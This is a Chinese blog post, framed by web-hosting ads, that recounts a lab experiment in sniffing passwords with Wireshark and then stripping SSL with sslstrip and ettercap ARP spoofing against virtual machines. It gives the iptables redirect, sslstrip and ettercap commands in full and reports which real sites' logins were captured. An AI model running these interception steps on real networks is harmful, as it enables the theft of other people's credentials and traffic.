十年网站开发经验 + 多家企业客户 + 靠谱的建站团队
量身定制 + 运营维护+专业推广+无忧售后,网站问题一站解决
因写了一段文字,就有这个抓包实验
成都网站建设哪家好,找成都创新互联公司!专注于网页设计、重庆网站建设公司、微信开发、微信平台小程序开发、集团企业网站设计等服务项目。核心团队均拥有互联网行业多年经验,服务众多知名企业客户;涵盖的客户类型包括:集装箱等众多领域,积累了大量丰富的经验,同时也获得了客户的一致表扬!--------------------------------
话说:“现在我们一到某处,第一件事便是问有没有WiFi”。WiFi成为当下的热门,在公共场合人们最喜欢免费WiFi。但用着用着后不觉QQ被盗了。这WiFi便是诱饵,钓鱼人设了一个局,我们以为捡到便宜了,须不知,我们上勾了。QQ被盗,邮箱被浏览等等。免费虽好,请谨慎。
---------------------------------------
1.利用wireshark抓包测试51cto帐户及密码
环境的搭建
网络环境:网关:192.168.199.1;
测试主机:192.168.199.101,ubuntu13.04/wireshark;
测试目标:51cto.com
步骤
a.ubuntu 13.04安装wireshark
sudo apt-get wireshark
b. 新建wireshark组把普通用户加入其中,给wireshark使用权限
sudo groupadd wireshark //加组wireshark
sudo gpasswd -a zozlin wireshark //向组 GROUP 中添加用户 USER
sudo chgrp wireshark /usr/bin/dumpcap // 更抓包文件改组
sudo chmod 4755 /usr/bin/dumpcap //可执行权限
错误:
解决方法:sudo gedit /usr/share/wireshark/init.lua
倒数第二行原来为:dofile(DATA_DIR.."console.lua")改为--dofile(DATA_DIR.."console.lua")
c. sudo wireshark 选择网卡(在本机测试)
定过滤规则
ip.src==192.168.199.100 && http (源地址及http协议)
重点 (post application/x-www-form-urllencoded)
先试试天涯论坛和163邮件的密码,ssl己加密传输了。后51cto 发现是明文帐号密码
-----------------------------------------
2.利用sslstrip和ettercap突破ssl嗅探密码
环境的搭建
网络环境:网关:192.168.199.1;
***主机:192.168.199.101,ubuntu13.04/wireshark/sslstrip;
被***主机:192.168.199.105/103,虚拟机Windowsxp,IE6;
测试目标:51cto.com mail.163.com tianya.cn baidu.com
步骤
下载
http://www.thoughtcrime.org/software/sslstrip/
解压
tar -zxvf sslstrip-0.9.tar.gz
安装
sslstrip python setup.py install
打开ip_forword转发
echo “1”>/proc/sys/net/ipv4/ip_forward
使用Iptables过滤数据包 //通过iptables 把所有http数据导入到10000端口,我们用sslstrip监听10000端口,并得到我们想要的数据
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
sslstrip -l 10000
利用ettercap进行arp欺骗
ettercap –T –q –M arp:remote /192.168.199.103/ /192.168.199.1/
成果
mail.163.com 51cto.com 破
baidu.com 密码再次加密了
tianya.cn 未破
参考1.http://www.freebuf.com/articles/web/5929.html
2.http://www.blogjava.net/heyang/archive/2011/04/05/340330.html
3.http://www.linuxde.net/2011/11/2522.html
另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。